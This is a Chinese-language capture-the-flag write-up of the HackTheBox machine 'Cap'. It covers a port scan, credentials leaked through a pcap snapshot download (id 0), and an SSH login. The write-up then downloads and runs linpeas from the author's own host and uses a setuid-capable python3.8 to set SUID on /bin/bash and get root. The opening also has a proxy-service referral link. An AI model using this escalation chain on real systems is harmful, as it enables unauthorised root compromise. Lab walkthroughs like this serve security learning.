Cap

image

之前一直都是做的thl的靶机,基础的都打完了,想着换个平台打点难度高一点的靶机来提升自己,同时又因为之前节点质量不高打不了htb。最近换了节点https://panel.meslcloud.com/#/register?code=MrRbOIeL 所以打算测试一下能不能打就打了一个easy的靶机

信息搜集

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
┌──(root㉿Eecho)-[~]
└─# rustscan -a 10.129.75.252 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 10.129.75.252:22
Open 10.129.75.252:21
Open 10.129.75.252:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 10.129.75.252
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-08-01 14:35 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:35
Completed NSE at 14:35, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:35
Completed NSE at 14:35, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:35
Completed NSE at 14:35, 0.00s elapsed
Initiating Ping Scan at 14:35
Scanning 10.129.75.252 [4 ports]
Completed Ping Scan at 14:35, 0.34s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:35
Completed Parallel DNS resolution of 1 host. at 14:35, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:35
Scanning 10.129.75.252 [3 ports]
Discovered open port 22/tcp on 10.129.75.252
Discovered open port 80/tcp on 10.129.75.252
Discovered open port 21/tcp on 10.129.75.252
Completed SYN Stealth Scan at 14:35, 0.57s elapsed (3 total ports)
Initiating Service scan at 14:35
Scanning 3 services on 10.129.75.252
Completed Service scan at 14:35, 6.93s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.129.75.252
Retrying OS detection (try #2) against 10.129.75.252
Initiating Traceroute at 14:36
Completed Traceroute at 14:36, 9.04s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:36
Completed Parallel DNS resolution of 1 host. at 14:36, 1.00s elapsed
DNS resolution of 1 IPs took 1.00s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 2, CN: 0]
NSE: Script scanning 10.129.75.252.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:36
Completed NSE at 14:36, 14.32s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:36
Completed NSE at 14:36, 7.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:36
Completed NSE at 14:36, 0.00s elapsed
Nmap scan report for 10.129.75.252
Host is up, received reset ttl 63 (0.46s latency).
Scanned at 2026-08-01 14:35:07 CST for 103s

PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2vrva1a+HtV5SnbxxtZSs+D8/EXPL2wiqOUG2ngq9zaPlF6cuLX3P2QYvGfh5bcAIVjIqNUmmc1eSHVxtbmNEQjyJdjZOP4i2IfX/RZUA18dWTfEWlNaoVDGBsc8zunvFk3nkyaynnXmlH7n3BLb1nRNyxtouW+q7VzhA6YK3ziOD6tXT7MMnDU7CfG1PfMqdU297OVP35BODg1gZawthjxMi5i5R1g3nyODudFoWaHu9GZ3D/dSQbMAxsly98L1Wr6YJ6M6xfqDurgOAl9i6TZ4zx93c/h1MO+mKH7EobPR/ZWrFGLeVFZbB6jYEflCty8W8Dwr7HOdF1gULr+Mj+BcykLlzPoEhD7YqjRBm8SHdicPP1huq+/3tN7Q/IOf68NNJDdeq6QuGKh1CKqloT/+QZzZcJRubxULUg8YLGsYUHd1umySv4cHHEXRl7vcZJst78eBqnYUtN3MweQr4ga1kQP4YZK5qUQCTPPmrKMa9NPh1sjHSdS8IwiH12V0=
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDqG/RCH23t5Pr9sw6dCqvySMHEjxwCfMzBDypoNIMIa8iKYAe84s/X7vDbA9T/vtGDYzS+fw8I5MAGpX8deeKI=
| 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPbLTiQl+6W0EOi8vS+sByUiZdBsuz0v/7zITtSuaTFH
80/tcp open http syn-ack ttl 63 Gunicorn
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET
|_http-title: Security Dashboard
|_http-server-header: gunicorn
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: DD-WRT (Linux 2.4.36) (94%), Cisco Unified Communications Manager VoIP adapter (92%), Android 7.1.2 (Linux 3.10) (92%), DD-WRT v23 (Linux 2.4.36) (92%), Vyatta router (Linux 2.6.26) (92%), Linux 2.6.18 (92%), Linux 3.2.0 (92%), Linux 5.18 (92%), Linux 5.4 (92%), MikroTik RouterOS 5.25 (Linux 2.6.35) (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.99%E=4%D=8/1%OT=21%CT=%CU=41280%PV=Y%DS=2%DC=I%G=N%TM=6A6D9402%P=x86_64-pc-linux-gnu)
SEQ()
ECN(R=N)
T1(R=N)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 394.34 ms 10.10.16.1
2 ... 30

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:36
Completed NSE at 14:36, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:36
Completed NSE at 14:36, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:36
Completed NSE at 14:36, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.99 seconds
Raw packets sent: 229 (13.060KB) | Rcvd: 18 (10.682KB)
  • 22 SSH
  • 21 FTP
  • 80 HTTP

流量包分析

image

主页有个快照功能

image

可以下载pcap数据包,当前id是2经过尝试发现id为0的时候存在凭证泄露

image

image

image

ssh登录到nathon用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
┌──(root㉿Eecho)-[~]
└─# ssh nathan@10.129.75.252
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
nathan@10.129.75.252's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sat Aug 1 07:42:45 UTC 2026

System load: 0.0
Usage of /: 36.9% of 8.73GB
Memory usage: 22%
Swap usage: 0%
Processes: 221
Users logged in: 0
IPv4 address for eth0: 10.129.75.252
IPv6 address for eth0: dead:beef::a0de:adff:fed2:e816

* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.

https://ubuntu.com/blog/microk8s-memory-optimisation

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Aug 1 05:53:40 2026 from 10.10.17.213
nathan@cap:~$ id
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)

提权

nathan -> root

上传linpeas枚举提权

1
2
3
4
5
6
7
8
9
10
11
12
13
nathan@cap:/tmp$ wget http://10.10.17.213/lin2026.sh
--2026-08-01 08:38:15-- http://10.10.17.213/lin2026.sh
Connecting to 10.10.17.213:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1046034 (1022K) [application/x-sh]
Saving to: ‘lin2026.sh’

lin2026.sh 100%[============================================================================>] 1022K 146KB/s in 40s

2026-08-01 08:39:03 (25.4 KB/s) - ‘lin2026.sh’ saved [1046034/1046034]

nathan@cap:/tmp$ chmod +x lin2026.sh
nathan@cap:/tmp$ ./lin2026.sh

image

/usr/bin/python3.8拥有cap_setuid+eip(表示该程序拥有修改自身用户身份的有效权限,可通过 setuid(0) 将普通用户提升为 root。)

1
2
3
4
5
6
7
8
9
10
11
12
13
nathan@cap:~$ cd /tmp
nathan@cap:/tmp$ vim exp.py
nathan@cap:/tmp$ cat exp.py
import os
os.setuid(0)
os.system("chmod +s /bin/bash")
nathan@cap:/tmp$ /usr/bin/python3.8 exp.py
nathan@cap:/tmp$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Jun 18 2020 /bin/bash
nathan@cap:/tmp$ /bin/bash -p
bash-5.0# id
uid=1001(nathan) gid=1001(nathan) euid=0(root) egid=0(root) groups=0(root),1001(nathan)
bash-5.0#